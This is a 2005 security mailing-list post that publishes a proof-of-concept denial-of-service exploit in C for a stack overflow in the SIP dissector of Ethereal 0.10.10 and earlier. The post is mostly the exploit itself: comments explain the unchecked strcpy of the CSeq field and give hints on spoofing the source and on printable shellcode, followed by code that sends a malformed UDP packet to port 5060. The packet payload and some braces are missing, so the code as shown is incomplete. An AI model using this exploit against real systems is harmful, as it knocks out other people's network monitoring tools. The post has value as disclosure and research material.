lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 11 May 2005 18:49:22 +0100 (WAT)
From: "Shaun Colley" <>
Subject: Ethereal <= 0.10.10 SIP dissector stack overflow DoS exploit

Proof-of-concept DoS exploit for the ethereal SIP dissector stack overflow
vulnerability discovered by SecurityLab.

/* ethereal_sip_dos.c - by Shaun Colley <shaun rsc cx>
 * This code exploits the Ethereal <= 0.10.10 SIP dissector stack overflow
 * reported by SecurityLab.  See the advisory for more details (i.e. fix) -
 * <>
 * This buffer overflow bug is due to a blind copy of the "CSeq" field in
a packet containing a SIP header.
 * If a malformed SIP packet appears on the same interface as the
vulnerable Ethereal,
 * Ethereal will strcpy() the SIP header's CSeq field into a buffer
without bounds checking.
 * This code transmits a SIP header (in a UDP datagram) with an overly
long CSeq field, which
 * results in a stack overflow because of the strcpy().  It is probably
 * possible to execute code, but since Ethereal first validates each byte
with an 'isalpha' check,
 * shellcode may have to be printable ASCII-only if the bug were to be
exploited.  I am not
 * certain on how easy code execution would be.  Important things get
overwritten during the overflow,
 * so the attacker would need to fill them back in themselves.
 * Ethereal have released a patch.  Ethereal 0.10.11 fixes this bug.
 * syntax: ethereal_sip_dos <host> - where <host> is an address that makes
the packet appear on
 * the Ethereal host's interface, i.e. target's IP address.
 * This code doesn't spoof the source address - if you care, capture the
packet and retransmit
 * it with a spoofed source IP address.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

/* malformed SIP packet */
char sip_packet[] =

int main(int argc, char *argv[]) {
  if(argc < 2) {
    printf("syntax: %s <host>\n", argv[0]);
    return 1;

  struct sockaddr_in dest;
  struct hostent *he;
  int sock, slen = sizeof(struct sockaddr);

  if((he = gethostbyname(argv[1])) == NULL) {
    printf("Couldn't resolve %s\n", argv[1]);
    return 1;

  if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
    return 1;

  dest.sin_port = htons(5060);
  dest.sin_family = AF_INET;
  dest.sin_addr = *((struct in_addr *)he->h_addr);

  if (sendto(sock, sip_packet, sizeof(sip_packet), 0, (struct sockaddr
*)&dest, slen)== -1) {
    printf("Error sending packet!\n");
    return 1;

  printf("Exploit packet sent..\n");

  return 0;

If the code looks screwed, reference:


Powered by blists - more mailing lists